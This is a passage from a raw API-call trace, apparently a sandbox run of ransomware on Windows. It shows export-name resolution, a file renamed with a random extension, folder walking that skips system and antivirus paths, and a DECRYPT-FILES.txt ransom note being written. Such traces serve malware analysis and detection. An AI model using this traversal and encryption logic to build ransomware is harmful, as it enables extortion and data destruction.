lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.102] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.102] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.103] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.103] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.103] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.103] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.103] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.103] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.103] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.103] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.103] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.103] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.103] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.103] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.103] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.103] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.103] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.103] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.103] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.103] lstrlenA (lpString="DELETEATOM") returned 10 [0078.103] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.103] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.104] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.104] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.104] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.104] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.104] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.104] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.104] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.104] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.104] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.104] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.104] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.104] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.104] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.104] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.104] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.104] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.104] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.104] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.104] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.105] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.105] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.105] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.105] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.105] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.105] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.105] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.105] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.105] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.105] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.105] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.105] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.105] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.105] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.105] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.105] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.105] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.107] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.107] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.107] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.107] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.107] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.107] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.107] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.107] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.107] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.107] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.107] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.107] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.107] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 74 [0078.107] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.DmSyl0G") returned 82 [0078.108] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.DmSyl0G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl.dmsyl0g"), dwFlags=0x0) returned 1 [0078.108] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.108] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.108] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.109] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x90b3d80, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x90b3d80, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0078.109] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0078.109] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0078.109] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0078.109] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Program Files") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch=":\\Windows") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Games\\") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\All Users") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="AhnLab") returned 0x0 [0078.109] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.109] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0078.109] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.109] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\jkbimi8.tmp") returned 82 [0078.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0078.110] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0078.110] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.110] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\DECRYPT-FILES.txt") returned 88 [0078.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0078.112] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0078.113] CloseHandle (hObject=0x454) returned 1 [0078.113] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0078.113] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0078.113] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaac14f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac14f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0078.114] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.114] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaac14f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac14f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.114] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.114] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.114] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaac14f00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaac14f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac14f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.114] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.114] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x90b3d80, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x90b3d80, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x90d9ee0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.LNK", cAlternateFileName="")) returned 1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="DECRYPT-FILES.txt") returned 1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="autorun.inf") returned 1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="boot.ini") returned 1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="desktop.ini") returned 1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="ntuser.dat") returned -1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="iconcache.db") returned -1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="bootsect.bak") returned 1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="ntuser.dat.log") returned -1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="thumbs.db") returned -1 [0078.114] lstrcmpiW (lpString1="Global.LNK", lpString2="Bootfont.bin") returned 1 [0078.114] lstrlenW (lpString="Global.LNK") returned 10 [0078.114] lstrcmpiW (lpString1="LNK", lpString2="lnk") returned 0 [0078.114] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x90d9ee0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x34, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="DECRYPT-FILES.txt") returned 1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="boot.ini") returned 1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0078.114] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0078.114] lstrlenW (lpString="index.dat") returned 9 [0078.114] lstrcmpiW (lpString1="dat", lpString2="lnk") returned -1 [0078.114] lstrcmpiW (lpString1="dat", lpString2="exe") returned -1 [0078.114] lstrcmpiW (lpString1="dat", lpString2="sys") returned -1 [0078.115] lstrcmpiW (lpString1="dat", lpString2="dll") returned -1 [0078.115] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0078.115] lstrlenW (lpString="index.dat") returned 9 [0078.115] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0078.115] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="index.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" 